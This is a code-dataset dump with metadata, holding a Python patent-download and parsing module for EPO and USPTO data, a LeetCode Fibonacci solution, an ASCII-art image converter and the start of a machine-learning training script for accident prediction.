self.patent.findall('./SDOBI/B500/B540/B542')\r\n for i in range(0, len(language_names)):\r\n if language_names[i].text == 'en':\r\n self._set_title(titles[i].text)\r\n break\r\n\r\n date = self.patent.find('./SDOBI/B100/B140/date').text\r\n self.set_date(date[:4],date[4:6],date[6:])\r\n\r\n abstract = self.patent.find('./abstract[@lang=\\'en\\']/p')\r\n abstract = abstract.text if type(abstract) != type(None) else ''\r\n self.add2section(ABSTRACT,abstract)\r\n\r\n institutions = self.patent.findall('./SDOBI/B700/B710/B711/snm')\r\n institutions = {x.text for x in institutions}\r\n institutions = cleanup_institutions(institutions)\r\n self.addresses = {x:x for x in institutions}\r\n #self.update_with_list(list(cleanup_institutions(institutions)))\r\n\r\n authors = self.patent.findall('./SDOBI/B700/B720/B721/snm')\r\n authors = {x.text for x in authors}\r\n self.update_with_list(AUTHORS, list(cleanup_authors(list(authors))))\r\n\r\n claims = self.patent.findall('./claims/claim/claim-text')\r\n claims = {x.text for x in claims if type(x.text) != type(None)}\r\n for c in claims:\r\n self.add2section(CLAIMS,c)\r\n\r\n @staticmethod\r\n def loads(xml_file:str):\r\n try:\r\n tree = et.parse(xml_file)\r\n except et.ParseError: \r\n return None\r\n return tree.getroot()\r\n \r\n @classmethod\r\n def from_file(cls, xml_file:str):\r\n try:\r\n c = cls(cls.loads(xml_file))\r\n file = xml_file[xml_file.rfind('/')+1:]\r\n c['file'] = [file[file.rfind('\\\\')+1:]]\r\n return c\r\n except et.ParseError: \r\n return None\r\n\r\n\r\nclass USPTOjson (DocMine):\r\n def __init__(self, result_elements:list):\r\n self.patent = result_elements\r\n try:\r\n doc_number = self.patent['grantDocumentIdentifier']\r\n id_type = PATENT_GRANT_NUM\r\n date = self.patent['grantDate'] \r\n self.append_property('Application Date', self.patent['filingDate'])\r\n except KeyError:\r\n doc_number = self.patent['patentApplicationNumber']\r\n id_type = PATENT_APP_NUM\r\n date = self.patent['filingDate']\r\n \r\n super().__init__(id_type,doc_number)\r\n self.Identifiers[PATENT_APP_NUM] = self.patent['patentApplicationNumber']\r\n\r\n self.append_property('doc_number', doc_number[2:])\r\n self.append_property('country', doc_number[:2])\r\n self.set_date(date[-4:],date[:2],date[3:5])\r\n\r\n def get_cpc_codes(self):\r\n main_cpc = str(self.patent['mainCPCSymbolText'])\r\n self.append_property('CPC',main_cpc)\r\n further_cpcs = list(self.patent['furtherCPCSymbolArrayText'])\r\n self.update_with_list('CPC',further_cpcs)\r\n\r\n\r\n def has_cpc_codes(self, allowed_cpc_codes:set): \r\n main_cpc = str(self.patent['mainCPCSymbolText']).replace('/','-')\r\n if main_cpc in allowed_cpc_codes: return main_cpc\r\n\r\n cpcs = self.patent['furtherCPCSymbolArrayText']\r\n if type(cpcs) == type(None): return ''\r\n for c in cpcs:\r\n cpc_for_fname = str(c).replace('/','-')\r\n if cpc_for_fname in allowed_cpc_codes: return cpc_for_fname\r\n return ''\r\n\r\n def set_title(self):\r\n self._set_title(self.patent['inventionTitle'])\r\n\r\n def get_data(self):\r\n self.set_title()\r\n self.inventor_names = list(self.patent['inventorNameArrayText'])\r\n self.update_with_list(AUTHORS, list(cleanup_authors(self.inventor_names)))\r\n if type (self.patent['assigneeEntityName']) != type(None):\r\n institutions = [self.patent['assigneeEntityName']]\r\n institutions = cleanup_institutions(institutions)\r\n self.addresses = {x:x for x in institutions}\r\n #self.update_with_list(INSTITUTIONS, cleanup_institutions(institutions))\r\n\r\n abstract = self.patent['abstractText'][0]\r\n self.add2section(ABSTRACT,abstract)\r\n\r\n ct = self.patent['claimText']\r\n claims_text = str(self.patent['claimText'][0]) if type (ct) != type(None) else ''\r\n for i in range (1,9):\r\n claims_text = claims_text.replace(str(i)+'. ','|')\r\n claims = claims_text.split('|')\r\n \r\n for c in claims:\r\n if c:\r\n claims_pretty = list()\r\n ctext = c[:-1] if c[-1].isdigit() else c\r\n split_text = ctext.split(';')\r\n for s in split_text:\r\n more_splits = s.split(', ') if len(s) >= 3500 else [s]\r\n claims_pretty += more_splits\r\n \r\n claim_text = '. '.join(claims_pretty)\r\n self.add2section(CLAIMS,claim_text)\r\n\r\n def make_fname(self, cpc_code:str='', file_extension='xml'):\r\n try:\r\n title = str(self[TITLE][0])\r\n except KeyError:\r\n self.set_title()\r\n title = str(self[TITLE][0])\r\n \r\n title = title.replace('/','_')[:225]\r\n title = title.replace('\\\"','')\r\n title = title.replace('?','xxx')\r\n title = title.replace('\\n', ' ')\r\n title = title.replace(',', '')\r\n\r\n code = cpc_code.replace('/','-')\r\n code = code.replace('_','-')\r\n\r\n pat_grant_num = str()\r\n try:\r\n pat_grant_num = self.Identifiers[PATENT_GRANT_NUM]\r\n except KeyError: pass\r\n pat_app_num = self.Identifiers[PATENT_APP_NUM]\r\n\r\n if pat_grant_num:\r\n fname = code+'_'+pat_grant_num+'_'+title+'.'+file_extension\r\n else:\r\n fname = code+'(_'+pat_app_num+')_'+title+'.'+file_extension\r\n\r\n return fname\r\n\r\n def write(self, patent_dir:str, allowed_cpc_codes:set):\r\n fname = self.make_fname(self.has_cpc_codes(allowed_cpc_codes),'json')\r\n with open(patent_dir+fname,'w',encoding='utf-8') as f:\r\n f.write(json.dumps(self.patent, indent=1))\r\n\r\n @staticmethod\r\n def loads(json_file:str):\r\n return json.load(open(json_file))\r\n \r\n @classmethod\r\n def from_file(cls, json_file:str):\r\n c = cls(cls.loads(json_file))\r\n file = json_file[json_file.rfind('/')+1:]\r\n c['file'] = [file[file.rfind('\\\\')+1:]]\r\n return c\r\n\r\ndef has_ipc(ipc_code:str):\r\n if ipc_code in allowed_ipc_codes: return True\r\n ipc_base = ipc_code[:ipc_code.find('/')]\r\n return ipc_base in smoking_devices\r\n\r\n\r\ndef is_patent_start(line:str):\r\n if line[:23] == '': return True\r\n else: return False\r\n\r\ndef is_patent_end(line:str):\r\n if line[:24] == ' ': return True\r\n elif line == '': return True\r\n else: return False\r\n\r\ndef normalizeEPOipc(ipc_code:str, skip=1):\r\n ipc_code = ipc_code.strip()\r\n slash_pos = ipc_code.find('/')\r\n main_class = ipc_code[skip:slash_pos]\r\n main_class = main_class.split(' ')\r\n if len(main_class) > 2:\r\n classification_section = main_class[0]\r\n classification_class = main_class[1]\r\n classification_main_group = main_class[-1]\r\n elif len(main_class) == 2:\r\n classification_section = main_class[0]\r\n classification_class = main_class[1]\r\n classification_main_group = ''\r\n else:\r\n print('Unknown ipc code format: %s' % ipc_code)\r\n\r\n if len(classification_main_group) == 0: classification_main_group = '000' \r\n if len(classification_main_group) == 1: classification_main_group = '00'+classification_main_group\r\n if len(classification_main_group) == 2: classification_main_group = '0'+classification_main_group\r\n\r\n subgroup = ipc_code[slash_pos+1 : ].strip()\r\n subgroup = subgroup.split(' ')\r\n subgroup = subgroup[0]\r\n\r\n normalized_ipc_code = classification_section+classification_class+classification_main_group+'/'+subgroup\r\n return normalized_ipc_code\r\n\r\ndef load_docnumbers(fname:str, col_number:int=0, has_header=False):\r\n doc_numbers = list()\r\n \r\n with open(fname, 'r') as listing:\r\n if has_header: line = listing.readline()\r\n line = listing.readline().strip()\r\n while line:\r\n columns = line.split('\\t')\r\n #country, doc_number, kind = OPSxml.parse_patnum(columns[0])\r\n doc_numbers.append(columns[col_number])\r\n line = listing.readline().strip()\r\n return doc_numbers\r\n\r\n\r\ndef do_biblio_search(cql_query):\r\n client = epo_ops.Client(key=OPS_APIKEY, secret=OPS_SECRET)\r\n try:\r\n # getting search result counts\r\n search_response = client.published_data_search(cql=cql_query)\r\n except HTTPError: \r\n print('no patents found for cql query %s' % cql_query)\r\n return []\r\n\r\n search_response_xml = str(search_response.content,encoding='utf-8')\r\n tree = et.fromstring(search_response_xml)\r\n biblio_search = tree.find('{http://ops.epo.org}biblio-search')\r\n found_patents = int(biblio_search.attrib['total-result-count'])\r\n print('%d patents found for %s query' % (found_patents,cql_query))\r\n refs = biblio_search.findall('./{http://ops.epo.org}search-result/{http://ops.epo.org}publication-reference/')\r\n\r\n doc_ids = set()\r\n for pat_id in refs:\r\n #parsing search results\r\n #id_type = pat_id.attrib['document-id-type']\r\n #print ([elem.tag for elem in pat_id.iter()]) #to get list of tags\r\n country = pat_id.find('./{http://www.epo.org/exchange}country').text\r\n doc_number = pat_id.find('./{http://www.epo.org/exchange}doc-number').text\r\n kind = pat_id.find('./{http://www.epo.org/exchange}kind').text\r\n doc_ids.add(country+doc_number+kind)\r\n\r\n return doc_ids\r\n\r\ndef cache_exist_patnum(patent_dir:str,allowed_countries:set=None,with_kind=True):\r\n exist_docnums = set()\r\n for root, subdirs, files in os.walk(patent_dir):\r\n if files:\r\n print('searching in %s directory' % root)\r\n for xml_file in files:\r\n file_path = os.path.join(root, xml_file)\r\n try:\r\n tree = et.parse(file_path)\r\n except et.ParseError or FileNotFoundError: continue\r\n patent = OPSxml(tree.getroot())\r\n patent.get_docnum()\r\n if isinstance(allowed_countries, set):\r\n if patent.country in allowed_countries:\r\n docnum = patent.pat_number+patent.kind if with_kind else patent.pat_number\r\n exist_docnums.add(docnum)\r\n else:\r\n docnum = patent.pat_number+patent.kind if with_kind else patent.pat_number\r\n exist_docnums.add(docnum)\r\n return exist_docnums\r\n\r\ndef download_patent(country, doc_number, kind):\r\n client = epo_ops.Client(key=OPS_APIKEY, secret=OPS_SECRET)\r\n return client.published_data( # Retrieve bibliography data\r\n reference_type = 'publication', # publication, application, priority\r\n input = epo_ops.models.Docdb(doc_number, country, kind), # original, docdb, epodoc\r\n endpoint = 'biblio', # biblio includes authors, title, abstract, document id, year, applicant-name:\r\n # https://worldwide.espacenet.com/help?locale=en_EP&method=handleHelpTopic&topic=bibliographic\r\n constituents = [] # optional, list of constituents\r\n )\r\n\r\n# The doc number is a number given to a patent application when it is filed, published or or re-registred. \r\n# The number contains a two digit series code followed by a six digit serial number \r\n# assigned by the USPTO (Example: US9748552). Document kind must not be included into the doc_number\r\ndef download_patents_from_ops(patnum_file:str, patent_dir:str,allowed_cpc_codes:set):\r\n #patnum_file must have document IDs for download in the first column\r\n #middlewares = [mw.Dogpile(),mw.Throttler()] \r\n exist_docnums = cache_exist_patnum(patent_dir)\r\n print('Patent directory \"%s\" has %d patents'%(patent_dir,len(exist_docnums)))\r\n\r\n download_count = 0\r\n exist_counter = 0\r\n line_counter = 0\r\n doc_numbers = load_docnumbers(patnum_file)\r\n #doc_numbers = do_biblio_search(cql_query)# not implelented need to pass cql_query\r\n start = time.time()\r\n for patnum in doc_numbers:\r\n if patnum in exist_docnums: \r\n exist_counter +=1\r\n continue\r\n\r\n country, doc_number, kind = OPSxml.parse_patnum(patnum)\r\n if not kind: kind = ' '\r\n try:\r\n #downloading actual patent data\r\n patent_data = download_patent(country, doc_number, kind)\r\n except HTTPError: \r\n print('publication %s is not available' % (patnum))\r\n continue\r\n \r\n patent = OPSxml(et.fromstring(patent_data.content))\r\n patent.get_docnum()\r\n #assert(patent.pat_number == patnum)\r\n\r\n patent.write(patent_dir,allowed_cpc_codes)\r\n download_count +=1\r\n\r\n if download_count % 100 == 0:\r\n print('Download status: %d patents downloaded, %d found in current directory out of %d in \"%s\"' % (\r\n download_count,exist_counter, len(doc_numbers), patnum_file))\r\n print('Download time for %d patents is %s' %(download_count,OPSxml.execution_time(start)))\r\n start = time.time()\r\n sleep_time = 30\r\n print('will sleep for %d sec to avoid IP address block by Espacenet' %sleep_time)\r\n time.sleep(sleep_time)\r\n\r\n print('Total download: %d patents out of %d' % (download_count,line_counter))\r\n\r\ndef cleanup_patent_dir(validpatentnums:str, dir2clean:str, allowed_cpc_codes:set):\r\n valid_doc_numbers = load_docnumbers(validpatentnums)\r\n found_patnum = set()\r\n duplicate = dict()\r\n to_delete = open('to_delete.cmd', 'w', encoding='utf-8')\r\n \r\n for root, subdirs, files in os.walk(dir2clean):\r\n if files:\r\n print('searching in %s directory' % root)\r\n for xml_file in files:\r\n file_path = os.path.join(root, xml_file)\r\n try:\r\n tree = et.parse(file_path)\r\n except et.ParseError: continue\r\n patent = OPSxml(tree.getroot())\r\n #patent.get_docnum()\r\n\r\n if patent.pat_number not in valid_doc_numbers:\r\n to_delete.write('del %s\\n'% file_path)\r\n continue\r\n \r\n if patent.pat_number in found_patnum:\r\n try:\r\n duplicate[patent.pat_number].append(file_path)\r\n except KeyError:\r\n duplicate[patent.pat_number] = [file_path]\r\n continue\r\n else:\r\n found_patnum.add(patent.pat_number)\r\n patent.write(dir2clean,allowed_cpc_codes)\r\n \r\n to_delete.close()\r\n with open('dups_to_delete.cmd', 'w', encoding='utf-8') as dups:\r\n for k,v in duplicate.items():\r\n for f in v:\r\n dups.write(k+'\\t'+'del '+f+'\\n')\r\n\r\n\r\ndef download_patent_from_uspto(granted_patent_num, patent_dir:str,allowed_cpc_codes:set):\r\n params = {'patentNumber': str(granted_patent_num), 'start':0, 'rows':100, 'largeTextSearchFlag':'N'}\r\n data = urllib.parse.urlencode(params, quote_via=urllib.parse.quote)\r\n baseURL = 'https://developer.uspto.gov/ibd-api/v1/application/grants?'\r\n url = baseURL+data\r\n response = requests.get(url)\r\n result = json.loads(response.text)\r\n if result['results']:\r\n patent = USPTOjson(result['results'][0])\r\n patent.write(patent_dir,allowed_cpc_codes)\r\n\r\ndef download_patents_from_uspto(docnum_file,column_with_id,patent_dir:str,allowed_cpc_codes:set):\r\n docnums = load_docnumbers(docnum_file,column_with_id,has_header=True)\r\n for n in docnums:\r\n download_patents_from_uspto(n,patent_dir,allowed_cpc_codes)\r\n\r\nif __name__ == \"__main__\":\r\n patent_dir = 'D:/Python/Patents/Espacenet/Englis2/'\r\n allowed_cpc_codes = {'A61K9-0073', 'A61K9-0075', 'A61K9-0078'}\r\n #cleanup_patent_dir('A61K9 patent numbers all.txt',patent_dir,allowed_cpc_codes)\r\n #download_patents_from_ops('A61K9 patent numbers all.txt',patent_dir,allowed_cpc_codes)\r\n #download_patents_from_uspto('USPTO formulation patents.txt',1,'D:/Python/Patents/full patents with claims/USPTO/',allowed_cpc_codes)", "repo_name": "AntonYuryev/ElsevierAPI", "sub_path": "ElsevierAPI/ETM_API/ops.py", "file_name": "ops.py", "file_ext": "py", "file_size_in_byte": 27075, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xml.etree.ElementTree.ElementTree", "line_number": 62, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 62, "usage_type": "name"}, {"api_name": "references.DocMine", "line_number": 66, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 72, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 72, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 77, "usage_type": "argument"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 88, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 102, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 103, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 103, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 111, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 111, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 116, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 116, "usage_type": "name"}, {"api_name": "references.AUTHORS", "line_number": 171, "usage_type": "argument"}, {"api_name": "references.ABSTRACT", "line_number": 179, "usage_type": "argument"}, {"api_name": "references.TITLE", "line_number": 184, "usage_type": "name"}, {"api_name": "references.TITLE", "line_number": 187, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 198, "usage_type": "name"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 203, "usage_type": "call"}, {"api_name": "xml.dom.minidom", "line_number": 203, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.tostring", "line_number": 203, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 203, "usage_type": "name"}, {"api_name": "references.DocMine", "line_number": 207, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.Element", "line_number": 208, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 208, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 211, "usage_type": "argument"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 217, "usage_type": "name"}, {"api_name": "references.ABSTRACT", "line_number": 238, "usage_type": "argument"}, {"api_name": "references.AUTHORS", "line_number": 248, "usage_type": "argument"}, {"api_name": "references.CLAIMS", "line_number": 253, "usage_type": "argument"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 258, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 258, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 259, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 259, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 270, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 270, "usage_type": "name"}, {"api_name": "references.DocMine", "line_number": 274, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 279, "usage_type": "name"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 284, "usage_type": "name"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 288, "usage_type": "name"}, {"api_name": "references.AUTHORS", "line_number": 318, "usage_type": "argument"}, {"api_name": "references.ABSTRACT", "line_number": 326, "usage_type": "argument"}, {"api_name": "references.CLAIMS", "line_number": 344, "usage_type": "argument"}, {"api_name": "references.TITLE", "line_number": 348, "usage_type": "name"}, {"api_name": "references.TITLE", "line_number": 351, "usage_type": "name"}, {"api_name": "references.PATENT_GRANT_NUM", "line_number": 364, "usage_type": "name"}, {"api_name": "references.PATENT_APP_NUM", "line_number": 366, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 378, "usage_type": "call"}, {"api_name": "json.load", "line_number": 382, "usage_type": "call"}, {"api_name": "epo_ops.Client", "line_number": 449, "usage_type": "call"}, {"api_name": "requests.models.HTTPError", "line_number": 453, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 458, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 458, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 478, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 482, "usage_type": "call"}, {"api_name": "os.path", "line_number": 482, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 484, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 484, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 485, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 485, "usage_type": "name"}, {"api_name": "epo_ops.Client", "line_number": 498, "usage_type": "call"}, {"api_name": "epo_ops.models.Docdb", "line_number": 501, "usage_type": "call"}, {"api_name": "epo_ops.models", "line_number": 501, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 521, "usage_type": "call"}, {"api_name": "requests.models.HTTPError", "line_number": 532, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 536, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 536, "usage_type": "name"}, {"api_name": "time.time", "line_number": 547, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 550, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 560, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 564, "usage_type": "call"}, {"api_name": "os.path", "line_number": 564, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 566, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 566, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 567, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 567, "usage_type": "name"}, {"api_name": "urllib.parse.parse.urlencode", "line_number": 594, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 594, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 594, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 597, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 598, "usage_type": "call"}]}
+{"seq_id": "18735788719", "text": "#\n# @lc app=leetcode id=509 lang=python3\n#\n# [509] Fibonacci Number\n#\n\n# @lc code=start\nfrom functools import cache\n\nclass Solution:\n @cache\n def fib(self, n: int) -> int:\n return n if n < 2 else self.fib(n-2) + self.fib(n-1)\n \n \n# @lc code=end\n\nn = 42\n\n\ndef log(func):\n def wrapper(*args, **kw):\n from datetime import datetime \n time_start = datetime.now()\n #print('call %s():' % func.__name__)\n r = func(*args, **kw)\n time_end = datetime.now()\n print(\"---\\ntime cost:\",time_end-time_start)\n return r\n return wrapper\n\n@log\ndef run():\n so = Solution()\n r = so.fib(n)\n print(r)\n\nrun()", "repo_name": "lancelijade/leetcode", "sub_path": "vscode/509.fibonacci-number.py", "file_name": "509.fibonacci-number.py", "file_ext": "py", "file_size_in_byte": 674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "functools.cache", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}]}
+{"seq_id": "7803244048", "text": "import numpy as np\r\nimport cv2 as cv2\r\nimport matplotlib.pyplot as plt\r\n\r\n######## CONSTANTS ########\r\nimage_name = \"../content/sample_data/liverpoolLogo.png\"\r\nascii_max_x = 40\r\nascii_max_y = 40\r\nthreshold = 127\r\nart_char = \"█\"\r\n######## ######### ########\r\n\r\nimage_name = \"../content/sample_data/liverpoolLogo.png\"\r\nimg = cv2.imread(image_name, cv2.IMREAD_GRAYSCALE)\r\n\r\n\r\n_, img = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\r\n\r\nimg = cv2.resize(img, (ascii_max_x, ascii_max_y)) \r\n\r\nresult = \"\"\r\nfor i in range(ascii_max_x):\r\n for j in range(ascii_max_y):\r\n if img[(i, j)] > threshold:\r\n result += art_char\r\n else:\r\n result += \" \"\r\n result += \"\\n\"\r\nprint(\"NORMAL\")\r\nprint(result)\r\n\r\ninverted = \"\"\r\nfor i in range(ascii_max_x):\r\n for j in range(ascii_max_y):\r\n if img[(i, j)] > threshold:\r\n inverted += \" \"\r\n else:\r\n inverted += art_char\r\n inverted += \"\\n\"\r\nprint(\"INVERTED\")\r\nprint(inverted)\r\n", "repo_name": "yousefh409/asciiArtCreator", "sub_path": "ascii_art_creator.py", "file_name": "ascii_art_creator.py", "file_ext": "py", "file_size_in_byte": 935, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "72006334490", "text": "\"\"\"feature_impact_review.py: Returns X_train, y_train, X_val, y_val, pre_sample_train_local for feature selection process\"\"\"\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import ParameterGrid\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier, AdaBoostClassifier\nfrom sklearn.linear_model import LogisticRegression, Perceptron, SGDClassifier, OrthogonalMatchingPursuit, RandomizedLogisticRegression\nfrom sklearn.neighbors.nearest_centroid import NearestCentroid\nfrom sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import *\nimport numpy as np\nfrom utils import read_exp_utils\nfrom utils.write_exp_utils import ResultConfig, create_parameter_id\nfrom utils.misc_utils import calculate_accident_pct\nfrom xgboost import XGBClassifier\n\nfrom datetime import datetime\nfrom utils.orchestra_utils import preprocessor, sampler, rinse_spines, temporal_split, return_timed_spine, generate_temporal_features\n\n\nCLASSIFIER_CONFIG = {\n 'XG': XGBClassifier(),\n 'RF': RandomForestClassifier(),\n 'LR': LogisticRegression(),\n 'KNN': KNeighborsClassifier(n_neighbors=3),\n 'NB': GaussianNB(),\n 'ET': ExtraTreesClassifier(),\n 'AB': AdaBoostClassifier(),\n 'SVM': LinearSVC(), \n 'GB': GradientBoostingClassifier(),\n 'DT': DecisionTreeClassifier(), \n 'SGD': SGDClassifier()\n}\n\nimport pandas as pd\n\ndef load_experiment(experiment_id:int):\n out = read_exp_utils.read_experiment(experiment_id) \n classifier_config = out[0]\n grid_config = out[1]\n return classifier_config, grid_config \n\n############## PRECISION AT K\ndef joint_sort_descending(l1, l2):\n # l1 and l2 have to be numpy arrays\n idx = np.argsort(l1)[::-1]\n return l1[idx], l2[idx]\n\n\ndef generate_binary_at_k(y_scores, k):\n cutoff_index = int(len(y_scores) * (k / 100.0))\n test_predictions_binary = [1 if x < cutoff_index else 0 for x in range(len(y_scores))]\n return test_predictions_binary\n\n\ndef precision_at_k(y_true, y_scores, k):\n y_scores, y_true = joint_sort_descending(np.array(y_scores), np.array(y_true))\n preds_at_k = generate_binary_at_k(y_scores, k)\n #precision, _, _, _ = metrics.precision_recall_fscore_support(y_true, preds_at_k)\n #precision = precision[1] # only interested in precision for label 1\n precision = precision_score(y_true, preds_at_k)\n return precision\n\n\n\n\nfrom sklearn.metrics import *\n\nfrom utils.write_exp_utils import ResultConfig\n\nimport pickle\n\n\ndef adjusted_pred(y_pred_probs, t):\n \"\"\"\n Return predictions based on a given threshold(t)\n \"\"\"\n return [1 if y >= t else 0 for y in y_pred_probs]\n\ndef precision_recall_thresholds(y_true, y_pred_probs,threshold_step=0.01):\n precision_list = list()\n recall_list = list()\n thresholds=np.arange(0.0, 1.0, threshold_step)\n for t in thresholds:\n y_pred = adjusted_pred(y_pred_probs,t)\n precision_list.append(precision_score(y_true,y_pred,pos_label=1))\n recall_list.append(recall_score(y_true,y_pred,pos_label=1))\n #Recreate output in http://scikit-learn.org/stable/modules/generated/sklearn.metrics.precision_recall_curve.html#sklearn.metrics.precision_recall_curve\n precision_list.append(1.0)\n recall_list.append(0.0)\n return precision_list, recall_list, thresholds\n\n\n\n\ndef train_loop(spine_label,\n\n spine_test,\n\n experiment,\n conn\n ):\n \n \n print(spine_label.columns)\n \n grid_parameters = experiment.GRID_PARAMETERS\n classifiers = experiment.CLASSIFIERS\n experiment_id = experiment.EXPERIMENT_ID\n random_state = experiment.RANDOM_SEED\n \n print(\"\"\"\n ####################\n ## NEGATIVE SAMPLING (TEST)\n ####################\"\"\")\n \n \n print(spine_test.columns)\n \n if experiment.SAMPLE_TEST:\n print('Starting with Sampling for Test')\n spine_test = sampler(spine=spine_test, conn=conn, start_date=experiment.TEST_LABEL_START, seed=experiment.RANDOM_SEED,\n end_date=experiment.TEST_LABEL_END, **experiment.TEST_SAMPLE_METHOD_PARAMS)\n\n \n \n minimum_gap_size = experiment.VALIDATION_CONFIG['minimum_gap_size']\n rolling_type = experiment.VALIDATION_CONFIG['rolling_type']\n minimum_train_size = experiment.VALIDATION_CONFIG['minimum_train_size']\n minimum_val_size = experiment.VALIDATION_CONFIG['minimum_val_size']\n \n \n q = 'select end_datetime, hectokey_merged, {0} from {1}'.format(','.join(experiment.FEATURES_FLOW_LIST), experiment.FEATURES_FLOW_TABLE )\n \n with open('temp.txt', 'w') as f:\n f.write(q)\n print('Loading flow table') \n flow_feature_table = pd.read_sql('select end_datetime, hectokey_merged, {0} from {1}'.format(\n ','.join(experiment.FEATURES_FLOW_LIST),experiment.FEATURES_FLOW_TABLE), con=conn)\n\n print('Loading Ongevallen Data')\n ongevallen_feature_table = pd.read_sql('select datetime, hectokey_merged, {0} from {1}'.format(','.join(experiment.FEATURES_ONGEVALLEN_LIST),\n experiment.FEATURES_ONGEVALLEN_TABLE), con=conn)\n \n print('Loading Weather Feature Data')\n weather_station = pd.read_sql('select * from {0}'.format(experiment.WEATHER_STATION_MAPPING_TABLE), con=conn)\n knmi_feature_table = pd.read_sql('select datetime, weather_station, {0} from {1}'.format(\n ','.join(experiment.FEATURES_KNMI_LIST),experiment.FEATURES_KNMI_TABLE), con=conn)\n \n print('Loading Hectopunten Feature Data')\n hectopunten_feature_table = pd.read_sql('select rollup_year, hectokey_merged, {0} from {1}'.format(\n ','.join(experiment.FEATURES_HECTOPUNTEN_LIST),experiment.FEATURES_HECTOPUNTEN_TABLE), con=conn)\n \n \n print('Loading Temporal Feature Data')\n temporal_feature_table = pd.read_sql('select datetime, {0} from {1}'.format(','.join(experiment.FEATURES_TEMPORAL_LIST), experiment.FEATURES_TEMPORAL_TABLE), con=conn)\n \n print('Starting splits') \n for split_num, split in enumerate(temporal_split(experiment.LABEL_START, experiment.LABEL_END, 